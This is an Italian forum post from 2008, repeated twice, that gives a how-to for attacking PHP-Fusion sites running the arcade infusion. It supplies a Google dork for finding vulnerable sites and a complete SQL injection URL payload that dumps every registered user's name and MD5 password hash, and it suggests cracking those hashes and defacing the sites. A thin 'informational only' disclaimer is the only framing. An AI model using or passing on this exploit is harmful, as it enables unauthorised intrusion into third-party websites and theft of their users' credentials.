- 27 Ottobre 2008
- 287
- 0
- Miglior risposta
- 0
Questa guida e solo a scopo informativo, non mi assumo nessuna responsabilità dell'uso che ne farete.
Quasi tutti i siti sono patchati, una falla però che resta ancora presente è quella in quei siti php nuke che sfruttano /infusions/arcade/ o /infusions/topliste. Defacciare siti come questi è fin troppo facile, a causa di un errore nel server mySQL (se non erro, ma potrei ovviamente sbagliarmi). Basta scrivere su google:
allinurl:/infusions/arcade/
Cercare, e alla fine del link (
infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
Se l'errore non è stato patchato verranno scritte come "error my SQL", e le password in MD5 di tutti gli utenti registrati, che basterà decriptate
Ricordo che si puo fare anche con altervista quindi HTML...
Quasi tutti i siti sono patchati, una falla però che resta ancora presente è quella in quei siti php nuke che sfruttano /infusions/arcade/ o /infusions/topliste. Defacciare siti come questi è fin troppo facile, a causa di un errore nel server mySQL (se non erro, ma potrei ovviamente sbagliarmi). Basta scrivere su google:
allinurl:/infusions/arcade/
Cercare, e alla fine del link (
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
) aggiungereinfusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
Se l'errore non è stato patchato verranno scritte come "error my SQL", e le password in MD5 di tutti gli utenti registrati, che basterà decriptate
Ricordo che si puo fare anche con altervista quindi HTML...